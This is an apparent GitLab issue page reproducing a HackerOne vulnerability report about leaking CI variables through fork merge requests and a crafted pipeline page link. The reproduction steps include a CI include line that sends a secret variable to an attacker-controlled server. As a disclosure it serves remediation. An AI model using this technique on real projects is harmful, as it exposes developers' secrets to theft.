Backend: Leaking CI variables by visiting the pipeline new page via fork MRs
HackerOne report #2031741 by shells3c
on 2023-06-19, assigned to @ottilia_westerlund:
Report
SSOT
Refer to #417275 (closed)
Summary
Just by visiting a link crafted by the attacker, developers can leak CI variables to the outside
Steps to reproduce
- Setup a web server
- Create a public project with a CI variable, let's say
PASSWORD
- Using another account (attacker), fork the project, add (or edit)
.gitlab-ci.yml
:
include:
remote: 'https://<your_server>/${PASSWORD}.yaml'
- Copy the commit SHA and create a merge request with that change (to the victim project)
- The following URL is the attack vector:
https://gitlab.com/<victim_project_path>/-/pipelines/new?ref=<copied_sha>
If the victim visits this link, the CI variable will be sent to the attacker's server. You can try it out by accessing the URL from the victim account
Output of checks
This bug happens on GitLab.com
Impact
Developers can leak CI variables of their project by visiting a link
How To Reproduce
Please add reproducibility information to this section:
This page may contain information related to upcoming products, features and functionality. It is important to note that the information presented is for informational purposes only, so please do not rely on the information for purchasing or planning purposes. Just like with all projects, the items mentioned on the page are subject to change or delay, and the development, release, and timing of any products, features, or functionality remain at the sole discretion of GitLab Inc.